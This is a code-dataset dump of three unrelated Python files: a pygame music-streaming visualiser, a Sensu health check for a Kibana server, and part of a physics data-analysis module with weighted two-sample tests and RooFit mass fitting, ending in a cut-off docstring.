id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
11367170 | import pygame
import os
import configparser
import numpy as np
import cv2
from src import music
from src import files_work
def end_music(inp):
    """Signal that music playback should stop.

    NOTE(review): the original body only rebound the *local* name ``inp``;
    Python passes object references by value, so ``inp = False`` had no
    effect on the caller's variable whatsoever.  The flag is now returned
    so callers can assign it themselves: ``playing = end_music(playing)``.

    :param inp: current playing flag (value is ignored).
    :return: ``False``, the new value for the flag.
    """
    inp = False
    return inp
def main():
    """Run the Music_Stream window: loop video frames while streaming songs.

    Reads window size and fps from ``conf.ini`` (section ``[video]``),
    displays the image files found in ``[paths] img_path`` in sorted order
    as video frames, and plays every file returned by
    ``music.get_music_list`` in a loop, fading in the song title/artist
    text and showing the cover art saved under ``[paths] tmp_path``.
    """
    # Config init and read config file
    conf = files_work.get_conf()
    conf.read(os.path.dirname(os.path.abspath(__file__)) + '/conf.ini')
    width = int(conf['video']['width'])  # Get width from config file
    height = int(conf['video']['height'])  # Get height from config file
    fps = int(conf['video']['fps'])  # Get fps from config file
    # PyGame init
    pygame.init()
    pygame.mixer.init()
    pygame.font.init()
    my_font = pygame.font.Font(None, 30)
    screen = pygame.display.set_mode((width, height))  # Creating window
    pygame.display.set_caption("Music_Stream")
    clock = pygame.time.Clock()
    running = True
    frame_counter = 0  # Counter for frames in video
    song_counter = 0  # Index of the next song in the queue
    text_alpha = 0  # Alpha for the fade-in of the song text (0..255)
    is_playing = False  # NOTE(review): never read again -- dead variable
    img_array = sorted(os.listdir(conf['paths']['img_path']))  # Sorted array of frame files
    # Starting main loop
    while running:
        clock.tick(fps)  # Stuff for fps
        # Quit condition
        for event in pygame.event.get():
            if event.type == pygame.QUIT:  # Window quit button
                running = False
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_ESCAPE:  # Esc button
                    running = False
        # Video code block
        img = pygame.image.load(conf['paths']['img_path'] + '/' + img_array[frame_counter])  # Reading frame file
        img = pygame.transform.scale(img, (width, height))  # Scaling it for window size
        screen.blit(img, (0, 0))  # Displaying frame
        if frame_counter == len(img_array) - 1:  # If we come to last frame
            frame_counter = 0  # Start with first frame
        # NOTE(review): incrementing right after the reset means frame 0 is
        # only ever shown on the very first pass -- presumably intended to
        # be ``frame_counter = (frame_counter + 1) % len(img_array)``.
        frame_counter += 1  # Change frames' number
        # Music code block
        queue = music.get_music_list()  # List of songs (re-read every frame)
        if not pygame.mixer.music.get_busy():  # If song is not playing returns False
            if song_counter >= len(queue)-1:
                song_counter = 0
            # Playing next song
            pygame.mixer.music.load(queue[song_counter])
            song_name = music.get_name(queue[song_counter])
            artist_name = music.get_artist(queue[song_counter])
            cover = music.get_cover(queue[song_counter])
            print('Playing ' + song_name + ' : ' + artist_name)
            pygame.mixer.music.play()
            song_counter += 1
            text_alpha = 0  # restart the text fade-in for the new song
            # NOTE(review): called again with the already-incremented index,
            # i.e. for the *next* song -- confirm this is intentional.
            music.get_cover(queue[song_counter])
        # Display next song
        display_name = my_font.render(song_name, 1, (0, 0, 0))
        name_alpha = pygame.Surface(display_name.get_size(), pygame.SRCALPHA)
        name_alpha.fill((255, 255, 255, text_alpha))
        display_name.blit(name_alpha, (0, 0), special_flags=pygame.BLEND_RGBA_MULT)
        screen.blit(display_name, (width-300-display_name.get_width(), 70+display_name.get_height()))
        display_artist = my_font.render(artist_name, 1, (0, 0, 0))
        artist_alpha = pygame.Surface(display_artist.get_size(), pygame.SRCALPHA)
        artist_alpha.fill((255, 255, 255, text_alpha))
        display_artist.blit(artist_alpha, (0, 0), special_flags=pygame.BLEND_RGBA_MULT)
        screen.blit(display_artist, (width-300-display_artist.get_width(), 90+display_artist.get_height()))
        cover_surf = pygame.image.load(conf['paths']['tmp_path']+'/cover.png')
        cover_surf = pygame.transform.scale(cover_surf, (200, 200))
        cover_alpha = pygame.Surface(cover_surf.get_size(), pygame.SRCALPHA)
        # Cover fades in the opposite direction of the text.
        cover_alpha.fill((255, 255, 255, 255-text_alpha))
        cover_surf.blit(cover_alpha, (0, 0))
        screen.blit(cover_surf, (width-90-cover_surf.get_width(), 10))
        if text_alpha < 255:
            text_alpha += 1
        pygame.display.update()  # Updating PyGame screen
    pygame.quit()  # Quit from PyGame, close window etc
| StarcoderdataPython |
1900009 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2016 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import sys
import traceback
try:
import requests
except ImportError:
from python_extras import requests
ERRORCODE_OK = 0
ERRORCODE_WARNING = 1
ERRORCODE_CRITICAL = 2
ERRORCODE_UNKNOWN = 3
class SensuChecksException(Exception):
    """Exception that transports a sensu exit code plus a human-readable message."""

    def __init__(self, error_code, msg):
        # Keep both values inside the standard Exception ``args`` tuple so
        # the default string representation still exposes them.
        super(SensuChecksException, self).__init__((error_code, msg,))
        self.msg = msg
        self.error_code = error_code
def create_parser():
    """Build the command line parser for the kibana health check."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--host', default='localhost',
        help='Kibana host (default: localhost)')
    parser.add_argument(
        '--port', default='5601',
        help='Kibana port (default: 5601)')
    parser.add_argument(
        '--no-server', action='store_true',
        help='No checking kibana health status')
    parser.add_argument(
        '--no-modules', action='store_true',
        help='No checking kibana modules health status')
    return parser
def parse_args(parser):
    """Parse the CLI options, normalise the host and validate flag combinations."""
    config = parser.parse_args()
    # Drop a single trailing slash so later URL building does not yield '//'.
    host = config.host
    if host[-1:] == '/':
        config.host = host[:-1]
    # Disabling both checks would leave nothing to do.
    if config.no_server and config.no_modules:
        parser.error('Implicit requirements: options --no-server and --no-modules can not be used together')
    return config
def kibana_request(config, url):
    """Perform a GET against the kibana API and return the parsed JSON body.

    :param config: parsed CLI namespace providing ``host`` and ``port``.
    :param url: path relative to the kibana root, e.g. ``api/status``.
    :raises SensuChecksException: with ``ERRORCODE_UNKNOWN`` on any
        transport or HTTP error (the response details are included when
        a response object is available).
    """
    try:
        r = requests.get('http://{}:{}/{}'.format(config.host, config.port, url))
        r.raise_for_status()
        result = r.json()
    except requests.exceptions.RequestException as e:
        response_msg = ''
        if e.response is not None:
            response_msg = 'status_code: {}, headers={}'.format(e.response.status_code, e.response.headers)
        # FIX: spelling in the operator-facing message ('occured' -> 'occurred').
        raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: HTTP error occurred, msg={}, {}'.format(e, response_msg))
    except requests.exceptions.BaseHTTPError as e:
        raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: HTTP error occurred, {}'.format(e))
    return result
def check_kibana_health(metrics):
    """Map kibana's overall health state onto the sensu exit semantics.

    Raises a SensuChecksException for red (CRITICAL), yellow (WARNING)
    and anything that is not green (UNKNOWN); returns the summary string
    when the state is green.
    """
    overall = metrics['status']['overall']
    health_state = overall['state']
    summary = 'Kibana health status state={}, title={}, msg={}'.format(
        health_state, overall['title'], overall['nickname'])
    if health_state == 'red':
        raise SensuChecksException(ERRORCODE_CRITICAL, 'CRITICAL: ' + summary)
    if health_state == 'yellow':
        raise SensuChecksException(ERRORCODE_WARNING, 'WARNING: ' + summary)
    if health_state != 'green':
        raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: ' + summary)
    return summary
def check_modules_health(metrics):
    """Check every kibana module status and escalate on the first bad one.

    Raises a SensuChecksException for a red (CRITICAL), yellow (WARNING)
    or otherwise non-green (UNKNOWN) module; returns a summary string when
    all modules are green.
    """
    for module in metrics['status']['statuses']:
        state = module['state']
        detail = 'Kibana module "{}" health status state={}, msg={}'.format(
            module['name'], state, module['message'])
        if state == 'red':
            raise SensuChecksException(ERRORCODE_CRITICAL, 'CRITICAL: ' + detail)
        if state == 'yellow':
            raise SensuChecksException(ERRORCODE_WARNING, 'WARNING: ' + detail)
        if state != 'green':
            raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: ' + detail)
    return 'Kibana modules health status state is green'
def check_kibana(config, metrics):
    """Run the enabled checks and report the combined OK result.

    Sensu style: even success is delivered through the exception channel,
    as a SensuChecksException carrying ERRORCODE_OK.  Any failing check
    raises its own exception before we get here.
    """
    messages = []
    if not config.no_server:
        messages.append(check_kibana_health(metrics))
    if not config.no_modules:
        messages.append(check_modules_health(metrics))
    raise SensuChecksException(ERRORCODE_OK, ';'.join([m for m in messages if m]))
def main():
    """Entry point: run the kibana check and exit with the sensu code.

    Every outcome -- CRITICAL/WARNING/UNKNOWN as well as the OK raised by
    ``check_kibana`` on success -- travels as a SensuChecksException and
    is converted into the matching process exit code here.
    """
    try:
        parser = create_parser()
        config = parse_args(parser)
        metrics = kibana_request(config, 'api/status')
        check_kibana(config, metrics)
    except SensuChecksException as e:
        # Expected path: failures and the final OK both arrive here.
        print(e.msg)
        sys.exit(e.error_code)
    except Exception:
        # FIX: spelling of the operator-facing message ('occured').
        print('UNKNOWN: unexpected exception occurred')
        traceback.print_exc()
        sys.exit(ERRORCODE_UNKNOWN)
| StarcoderdataPython |
3342238 | <gh_stars>1-10
"""
@author: <NAME> 'Mayou36'
This modul contains several tools like fits.
DEPRECEATED! USE OTHER MODULES LIKE rd.data, rd.ml, rd.reweight, rd.score and rd.stat
DEPRECEATED!DEPRECEATED!DEPRECEATED!DEPRECEATED!DEPRECEATED!
"""
from .. import config as cfg # noqa
import numpy as np
# from raredecay.globals_ import out
from .. import meta_config as meta_cfg
from ..tools import dev_tool
# import matplotlib.pyplot as plt
def ks_2samp_ds(data1, data2, column):
    """
    Parameters
    ----------
    data1 : |hepds_type|
        Data set one for the 2sample test
    data2 : |hepds_type|
        Data set two for the 2sample test
    column : str
        Which column to use. Has to be the same name in both data sets

    Returns
    -------
    numeric
        Return the K-S two sample test hypothesis score.
    """
    # Python 2/3 compatibility, str
    column = str(column)
    # Pull plain arrays out of the two HEPDataStorage objects and delegate
    # to the weighted KS implementation.
    sample1, _, w1 = data1.make_dataset(columns=column)
    sample2, _, w2 = data2.make_dataset(columns=column)
    return ks_2samp(
        data1=np.array(sample1[column].values),
        data2=np.array(sample2[column].values),
        weights1=np.array(w1),
        weights2=np.array(w2),
    )
def ks_2samp(data1, data2, weights1=None, weights2=None):
    """Weighted two sample Kolmogorov-Smirnov hypothesis test.

    The weighted version of the Kolmogorov-Smirnov test if two samples
    *data1* and *data2* with weights *weights1* and *weights2* respectively
    are drawn from the same continuous distribution.

    Parameters
    ----------
    data1 : array-like
        The first distribution.
    data2 : array-like
        The second distribution.
    weights1 : array-like
        The weights of the first distribution. The length has to be equal
        to the length of *data1*.
    weights2 : array-like
        The weights of the second distribution. The length has to be equal
        to the length of *data2*.

    Returns
    -------
    numeric
        Return the K-S two sample test hypothesis score.
    """
    # check and set input: missing weights default to unit weights
    weights1 = (
        np.ones(len(data1))
        if dev_tool.is_in_primitive(weights1)
        else np.array(weights1)
    )
    weights2 = (
        np.ones(len(data2))
        if dev_tool.is_in_primitive(weights2)
        else np.array(weights2)
    )
    data1 = np.array(data1)
    data2 = np.array(data2)
    # sort each sample and keep its weights aligned
    ix1 = np.argsort(data1)
    ix2 = np.argsort(data2)
    data1 = data1[ix1]
    data2 = data2[ix2]
    weights1 = weights1[ix1]
    weights2 = weights2[ix2]
    data = np.concatenate([data1, data2])
    # weighted empirical CDFs, prepended with 0 for values below all data
    cwei1 = np.hstack([0, np.cumsum(weights1) / np.sum(weights1)])
    cwei2 = np.hstack([0, np.cumsum(weights2) / np.sum(weights2)])
    # FIX: index with the plain integer array instead of wrapping it in an
    # extra list -- ``arr[[idx_array]]`` is treated as a multi-dimensional
    # index, which is deprecated and removed in modern numpy.
    cdf1we = cwei1[np.searchsorted(data1, data, side="right")]
    cdf2we = cwei2[np.searchsorted(data2, data, side="right")]
    # KS statistic: supremum of the absolute CDF difference
    return np.max(np.abs(cdf1we - cdf2we))
ks_2samp_ds.__doc__ = ks_2samp.__doc__.split("Parameter", 1)[0] + ks_2samp_ds.__doc__
def ad_2samp(data1, data2, column):
    """Weighted two sample Anderson-Darling test (UNFINISHED).

    NOTE(review): this function is visibly incomplete -- it extracts and
    sorts the two samples, computes the total weights ``n`` and ``m`` and
    defines an inner helper that itself stops after computing ``n_tot``.
    No statistic is computed and nothing is returned (implicitly ``None``).
    """
    # Python 2/3 compatibility, str
    column = str(column)
    # prepare data: plain numpy arrays out of the HEPDataStorage objects
    data1, targets1, weights1 = data1.make_dataset(columns=column)
    data2, targets2, weights2 = data2.make_dataset(columns=column)
    weights1 = np.array(weights1)
    weights2 = np.array(weights2)
    data1 = np.array(data1[column].values)
    data2 = np.array(data2[column].values)
    # sort data and keep the weights aligned
    ix1 = np.argsort(data1)
    ix2 = np.argsort(data2)
    data1 = data1[ix1]
    data2 = data2[ix2]
    weights1 = weights1[ix1]
    weights2 = weights2[ix2]
    # effective sample sizes (sums of weights)
    n = np.sum(weights1)
    m = np.sum(weights2)

    def _anderson_2samp_right(samples, data_sorted, data_unique_sorted, n_events):
        # Incomplete helper: only the total event count is computed so far.
        n_tot = sum(n_events)
def fit_mass(
    data,
    column,
    x,
    sig_pdf=None,
    bkg_pdf=None,
    n_sig=None,
    n_bkg=None,
    blind=False,
    nll_profile=False,
    second_storage=None,
    log_plot=False,
    pulls=True,
    sPlot=False,
    bkg_in_region=False,
    importance=3,
    plot_importance=3,
):
    """Fit a given pdf to a variable distribution.

    A quite versatile function doing several things connected to fitting.

    Parameters
    ----------
    data : |hepds_type|
        The data containing the variable to fit to
    column : str
        The name of the column to fit the pdf to
    x : RooRealVar
        The RooRealVar to fit to.
    sig_pdf : RooFit pdf
        The signal Probability Density Function. The variable to fit to has
        to be named 'x'.
    bkg_pdf : RooFit pdf
        The background Probability Density Function. The variable to fit to has
        to be named 'x'.
    n_sig : None or numeric
        The number of signals in the data. If it should be fitted, use None.
    n_bkg : None or numeric
        The number of background events in the data.
        If it should be fitted, use None.
    blind : boolean or tuple(numberic, numberic)
        If False, the data is fitted. If a tuple is provided, the values are
        used as the lower (the first value) and the upper (the second value)
        limit of a blinding region, which will be omitted in plots.
        Additionally, no true number of signal will be returned but only fake.
    nll_profile : boolean
        If True, a Negative Log-Likelihood Profile will be generated. Does not
        work with blind fits.
    second_storage : |hepds_type|
        A second data-storage that will be concatenated with the first one.
    importance : |importance_type|
        |importance_docstring|
        NOTE(review): currently unused inside the function body.
    plot_importance : |plot_importance_type|
        |plot_importance_docstring|

    Return
    ------
    tuple(numerical, numerical, object)
        The number of signals, the number of background events in the
        signal-region and -- depending on the flags -- the sWeights array
        (``sPlot=True``) or the combined fitted pdf. If a blind fit is
        performed, the signal will be a fake number. If no number of
        background events is required, -999 will be returned.
    """
    # ROOT/RooFit are imported lazily so the module can be used without them.
    import ROOT
    from ROOT import (
        RooRealVar,
        RooArgList,
        RooArgSet,
        RooAddPdf,
        RooDataSet,
        RooAbsReal,
    )
    from ROOT import RooFit, RooCBShape, RooExponential
    from ROOT import RooGaussian, RooMinuit
    from ROOT import (
        TCanvas,
    )  # HACK to prevent not plotting canvas by root_numpy import. BUG.
    from root_numpy import array2tree
    from ROOT import RooCategory, RooUnblindPrecision

    # Python 2/3 compatibility, str
    column = dev_tool.entries_to_str(column)
    if not (isinstance(column, str) or len(column) == 1):
        raise ValueError(
            "Fitting to several columns " + str(column) + " not supported."
        )
    if type(sig_pdf) == type(bkg_pdf) == None:
        raise ValueError("sig_pdf and bkg_pdf are both None-> no fit possible")
    if blind is not False:
        # ``blind`` arrives as (lower, upper) of the blinding window.
        lower_blind, upper_blind = blind
        blind = True
    # Sentinel returned when no background estimate in the region is requested.
    n_bkg_below_sig = -999
    # create data
    data_name = data.name
    data_array, _t1, _t2 = data.make_dataset(second_storage, columns=column)
    del _t1, _t2
    # double crystalball variables
    min_x, max_x = min(data_array[column]), max(data_array[column])
    # x = RooRealVar("x", "x variable", min_x, max_x)
    # create data: convert to a structured array named 'x' for array2tree
    data_array = np.array([i[0] for i in data_array.as_matrix()])
    try:
        data_array.dtype = [("x", np.float64)]
    except:
        data_array.dtype = [("x", np.float64)]
        print("hack needed")
    tree1 = array2tree(data_array, "x")
    data = RooDataSet("data", "Data", RooArgSet(x), RooFit.Import(tree1))

    # # TODO: export somewhere? does not need to be defined inside...
    # mean = RooRealVar("mean", "Mean of Double CB PDF", 5280, 5100, 5600)#, 5300, 5500)
    # sigma = RooRealVar("sigma", "Sigma of Double CB PDF", 40, 0.001, 200)
    # alpha_0 = RooRealVar("alpha_0", "alpha_0 of one side", 5.715)#, 0, 150)
    # alpha_1 = RooRealVar("alpha_1", "alpha_1 of other side", -4.019)#, -200, 0.)
    # lambda_0 = RooRealVar("lambda_0", "Exponent of one side", 3.42)#, 0, 150)
    # lambda_1 = RooRealVar("lambda_1", "Exponent of other side", 3.7914)#, 0, 500)
    #
    # # TODO: export somewhere? pdf construction
    # frac = RooRealVar("frac", "Fraction of crystal ball pdfs", 0.479, 0.01, 0.99)
    #
    # crystalball1 = RooCBShape("crystallball1", "First CrystalBall PDF", x,
    #                           mean, sigma, alpha_0, lambda_0)
    # crystalball2 = RooCBShape("crystallball2", "Second CrystalBall PDF", x,
    #                           mean, sigma, alpha_1, lambda_1)
    # doubleCB = RooAddPdf("doubleCB", "Double CrystalBall PDF",
    #                      crystalball1, crystalball2, frac)
    # n_sig = RooRealVar("n_sig", "Number of signals events", 10000, 0, 1000000)

    # test input
    if n_sig == n_bkg == 0:
        raise ValueError("n_sig as well as n_bkg is 0...")
    # Yield parameters: free (None), fixed (>= 0) or invalid.
    if n_bkg is None:
        n_bkg = RooRealVar("n_bkg", "Number of background events", 10000, 0, 500000)
    elif n_bkg >= 0:
        n_bkg = RooRealVar("n_bkg", "Number of background events", int(n_bkg))
    else:
        raise ValueError("n_bkg is not >= 0 or None")
    if n_sig is None:
        n_sig = RooRealVar("n_sig", "Number of signal events", 1050, 0, 200000)
        # START BLINDING: hide the fitted signal yield behind a scrambled value
        blind_cat = RooCategory("blind_cat", "blind state category")
        blind_cat.defineType("unblind", 0)
        blind_cat.defineType("blind", 1)
        if blind:
            blind_cat.setLabel("blind")
            blind_n_sig = RooUnblindPrecision(
                "blind_n_sig",
                "blind number of signals",
                "wasistdas",
                n_sig.getVal(),
                10000,
                n_sig,
                blind_cat,
            )
        else:
            # blind_cat.setLabel("unblind")
            blind_n_sig = n_sig
            print("n_sig value " + str(n_sig.getVal()))
        # END BLINDING
    elif n_sig >= 0:
        n_sig = RooRealVar("n_sig", "Number of signal events", int(n_sig))
    else:
        raise ValueError("n_sig is not >= 0")

    # if not blind:
    #     blind_n_sig = n_sig

    # # create bkg-pdf
    # lambda_exp = RooRealVar("lambda_exp", "lambda exp pdf bkg", -0.00025, -1., 1.)
    # bkg_pdf = RooExponential("bkg_pdf", "Background PDF exp", x, lambda_exp)

    # Extended sum pdf: signal + background with their (possibly blinded) yields.
    if blind:
        comb_pdf = RooAddPdf(
            "comb_pdf",
            "Combined DoubleCB and bkg PDF",
            RooArgList(sig_pdf, bkg_pdf),
            RooArgList(blind_n_sig, n_bkg),
        )
    else:
        comb_pdf = RooAddPdf(
            "comb_pdf",
            "Combined DoubleCB and bkg PDF",
            RooArgList(sig_pdf, bkg_pdf),
            RooArgList(n_sig, n_bkg),
        )

    # create test dataset
    #    mean_gauss = RooRealVar("mean_gauss", "Mean of Gaussian", 5553, -10000, 10000)
    #    sigma_gauss = RooRealVar("sigma_gauss", "Width of Gaussian", 20, 0.0001, 300)
    #    gauss1 = RooGaussian("gauss1", "Gaussian test dist", x, mean_gauss, sigma_gauss)
    #    lambda_data = RooRealVar("lambda_data", "lambda exp data", -.002)
    #    exp_data = RooExponential("exp_data", "data example exp", x, lambda_data)
    #    frac_data = RooRealVar("frac_data", "Fraction PDF of data", 0.15)
    #
    #    data_pdf = RooAddPdf("data_pdf", "Data PDF", gauss1, exp_data, frac_data)
    #    data = data_pdf.generate(RooArgSet(x), 30000)

    #    data.printValue()
    #    xframe = x.frame()
    #    data_pdf.plotOn(xframe)
    #    print "n_cpu:", meta_cfg.get_n_cpu()
    #    input("test")
    #    comb_pdf.fitTo(data, RooFit.Extended(ROOT.kTRUE), RooFit.NumCPU(meta_cfg.get_n_cpu()))
    # HACK to get 8 cores in testing
    c5 = TCanvas("c5", "RooFit pdf not fit vs " + data_name)
    c5.cd()
    x_frame1 = x.frame()
    # data.plotOn(x_frame1)
    # comb_pdf.pdfList()[1].plotOn(x_frame1)
    if __name__ == "__main__":
        n_cpu = 8
    else:
        n_cpu = meta_cfg.get_n_cpu()
        print("n_cpu = ", n_cpu)
    # HACK
    #    n_cpu = 8
    # The extended maximum likelihood fit itself.
    result_fit = comb_pdf.fitTo(
        data,
        RooFit.Minos(ROOT.kTRUE),
        RooFit.Extended(ROOT.kTRUE),
        RooFit.NumCPU(n_cpu),
    )
    # HACK end
    if bkg_in_region:
        # Integrate the fitted background pdf over the signal region to get
        # the expected number of background events below the signal.
        x.setRange("signal", bkg_in_region[0], bkg_in_region[1])
        bkg_pdf_fitted = comb_pdf.pdfList()[1]
        int_argset = RooArgSet(x)
        #        int_argset = x
        #        int_argset.setRange("signal", bkg_in_region[0], bkg_in_region[1])
        integral = bkg_pdf_fitted.createIntegral(
            int_argset, RooFit.NormSet(int_argset), RooFit.Range("signal")
        )
        bkg_cdf = bkg_pdf_fitted.createCdf(int_argset, RooFit.Range("signal"))
        bkg_cdf.plotOn(x_frame1)
        #        integral.plotOn(x_frame1)
        n_bkg_below_sig = integral.getVal(int_argset) * n_bkg.getVal()
        x_frame1.Draw()

    if plot_importance >= 3:
        c2 = TCanvas("c2", "RooFit pdf fit vs " + data_name)
        c2.cd()
        x_frame = x.frame()
        #        if log_plot:
        #            c2.SetLogy()
        #        x_frame.SetTitle("RooFit pdf vs " + data_name)
        x_frame.SetTitle(data_name)
        if pulls:
            # Split the canvas: data+fit on top, pull distribution below.
            pad_data = ROOT.TPad("pad_data", "Pad with data and fit", 0, 0.33, 1, 1)
            pad_pulls = ROOT.TPad("pad_pulls", "Pad with data and fit", 0, 0, 1, 0.33)
            pad_data.SetBottomMargin(0.00001)
            pad_data.SetBorderMode(0)
            if log_plot:
                pad_data.SetLogy()
            pad_pulls.SetTopMargin(0.00001)
            pad_pulls.SetBottomMargin(0.2)
            pad_pulls.SetBorderMode(0)
            pad_data.Draw()
            pad_pulls.Draw()
            pad_data.cd()
        else:
            if log_plot:
                c2.SetLogy()
    if blind:
        # Plot only the sidebands, normalised to the sideband event fraction.
        # HACK
        column = "x"
        # END HACK
        x.setRange("lower", min_x, lower_blind)
        x.setRange("upper", upper_blind, max_x)
        range_str = "lower,upper"
        lower_cut_str = (
            str(min_x) + "<=" + column + "&&" + column + "<=" + str(lower_blind)
        )
        upper_cut_str = (
            str(upper_blind) + "<=" + column + "&&" + column + "<=" + str(max_x)
        )
        sideband_cut_str = "(" + lower_cut_str + ")" + "||" + "(" + upper_cut_str + ")"

        n_entries = data.reduce(sideband_cut_str).numEntries() / data.numEntries()
        #        raw_input("n_entries: " + str(n_entries))
        if plot_importance >= 3:
            data.plotOn(
                x_frame, RooFit.CutRange(range_str), RooFit.NormRange(range_str)
            )
            comb_pdf.plotOn(
                x_frame,
                RooFit.Range(range_str),
                RooFit.Normalization(n_entries, RooAbsReal.Relative),
                RooFit.NormRange(range_str),
            )
            if pulls:
                #                pull_hist(pull_frame=x_frame, pad_data=pad_data, pad_pulls=pad_pulls)
                x_frame_pullhist = x_frame.pullHist()
    else:
        if plot_importance >= 3:
            data.plotOn(x_frame)
            comb_pdf.plotOn(x_frame)
            if pulls:
                pad_pulls.cd()
                x_frame_pullhist = x_frame.pullHist()
                pad_data.cd()
            # Overlay the signal and background components with distinct styles.
            comb_pdf.plotOn(
                x_frame,
                RooFit.Components(sig_pdf.namePtr().GetName()),
                RooFit.LineStyle(ROOT.kDashed),
            )
            comb_pdf.plotOn(
                x_frame,
                RooFit.Components(bkg_pdf.namePtr().GetName()),
                RooFit.LineStyle(ROOT.kDotted),
            )
    #            comb_pdf.plotPull(n_sig)
    if plot_importance >= 3:
        x_frame.Draw()

        if pulls:
            pad_pulls.cd()
            x_frame.SetTitleSize(0.05, "Y")
            x_frame.SetTitleOffset(0.7, "Y")
            x_frame.SetLabelSize(0.04, "Y")

            #            c11 = TCanvas("c11", "RooFit\ pulls" + data_name)
            #            c11.cd()
            #            frame_tmp = x_frame
            frame_tmp = x.frame()

            #            frame_tmp.SetTitle("significance")
            frame_tmp.SetTitle(r"Roofit\ pulls\ " + data_name)
            frame_tmp.addObject(x_frame_pullhist)
            frame_tmp.SetMinimum(-5)
            frame_tmp.SetMaximum(5)

            #            frame_tmp.GetYaxis().SetTitle("significance")
            frame_tmp.GetYaxis().SetNdivisions(5)
            frame_tmp.SetTitleSize(0.1, "X")
            frame_tmp.SetTitleOffset(1, "X")
            frame_tmp.SetLabelSize(0.1, "X")
            frame_tmp.SetTitleSize(0.1, "Y")
            frame_tmp.SetTitleOffset(0.5, "Y")
            frame_tmp.SetLabelSize(0.1, "Y")

            frame_tmp.Draw()

    #            raw_input("")
    if not blind and nll_profile:
        # Scan the negative log-likelihood as a function of the signal yield.
        #        nll_range = RooRealVar("nll_range", "Signal for nLL", n_sig.getVal(),
        #                               -10, 2 * n_sig.getVal())
        sframe = n_sig.frame(RooFit.Bins(20), RooFit.Range(1, 1000))
        # HACK for best n_cpu
        lnL = comb_pdf.createNLL(data, RooFit.NumCPU(8))
        # HACK end
        lnProfileL = lnL.createProfile(ROOT.RooArgSet(n_sig))
        lnProfileL.plotOn(sframe, RooFit.ShiftToZero())
        c4 = TCanvas("c4", "NLL Profile")
        c4.cd()

        #        input("press ENTER to show plot")
        sframe.Draw()

    if plot_importance >= 3:
        pass

    params = comb_pdf.getVariables()
    params.Print("v")

    #    print bkg_cdf.getVal()

    if sPlot:
        # Compute sWeights for the signal component from the fitted model.
        sPlotData = ROOT.RooStats.SPlot(
            "sPlotData",
            "sPlotData",
            data,  # variable fitted to, RooDataSet
            comb_pdf,  # fitted pdf
            ROOT.RooArgList(
                n_sig,
                n_bkg,
                #                NSigB0s
            ),
        )
        sweights = np.array(
            [sPlotData.GetSWeight(i, "n_sig") for i in range(data.numEntries())]
        )
        return n_sig.getVal(), n_bkg_below_sig, sweights

    if blind:
        return blind_n_sig.getVal(), n_bkg_below_sig, comb_pdf
    else:
        return n_sig.getVal(), n_bkg_below_sig, comb_pdf

    #    nll_plot = RooRealVar("nll_plot", "NLL plotting range", 0.01, 0.99)
    #    nll_frame = nll_plot.frame()
    #    my_nll = comb_pdf.createNLL(data, RooFit.NumCPU(8))
    #    RooMinuit(my_nll).migrad()
    #    my_nll.plotOn(nll_frame)
    #    nll_frame.Draw()
    #    data.plotOn(xframe)
    #    comb_pdf.plotOn(xframe)
    #    xframe.Draw()

    #    return xframe
def pull_hist(pull_frame, pad_data, pad_pulls):
    """Add pulls into the current pad.

    Reads the data histogram and the first two fitted curves out of
    ``pull_frame``, builds a pull histogram for each curve and overlays
    both on ``pad_pulls``.  ``pad_data`` is activated first so the frame
    objects are looked up in the right pad.
    """
    #    import ROOT
    #    from ROOT import RooRealVar, RooArgList, RooArgSet, RooAddPdf, RooDataSet, RooAbsReal
    #    from ROOT import RooFit, RooCBShape, RooExponential
    #    from ROOT import RooGaussian, RooMinuit
    #    from ROOT import TCanvas  # HACK to prevent not plotting canvas by root_numpy import. BUG.
    #    from root_numpy import array2tree
    #    from ROOT import RooCategory, RooUnblindPrecision
    pad_data.cd()
    dataHist = pull_frame.getHist("datahistogram")
    curve1 = pull_frame.getObject(
        1
    )  # 1 is index in the list of RooPlot items (see printout from massplot->Print("V")
    curve2 = pull_frame.getObject(2)
    hresid1 = dataHist.makePullHist(curve1, True)
    hresid2 = dataHist.makePullHist(curve2, True)

    # RooHist* hresid = massplot->pullHist("datahistogram","blindtot")
    pad_pulls.cd()
    #    resid = M_OS.frame()
    pull_frame.addPlotable(hresid1, "P")
    pull_frame.addPlotable(hresid2, "P")
    pull_frame.SetTitle("")

    # pull_frame.GetXaxis().SetTitle("#it{m}(#it{#pi}^{ #plus}#it{#pi}^{ #minus}) [MeV/#it{c}^{2}]")
    # gStyle->SetPadLeftMargin(0.1)
def metric_vs_cut_fitted(
    data,
    predict_col,
    fit_col,
    sig_pdf,
    bkg_pdf,
    x,
    region,
    second_storage=None,
    metric="punzi",
    n_sig=None,
    n_bkg=None,
    stepsize=0.025,
    plot_importance=3,
):
    """Calculate a metric vs a given cut by estimating the bkg from the fit.

    For every cut value in [0, 1) (spacing ``stepsize``) the storages are
    reduced to the events passing ``cut < predict_col``, the mass fit is
    redone on ``fit_col`` and the metric is evaluated with the weighted
    number of surviving signal events and the fitted number of background
    events inside ``region``.

    Parameters
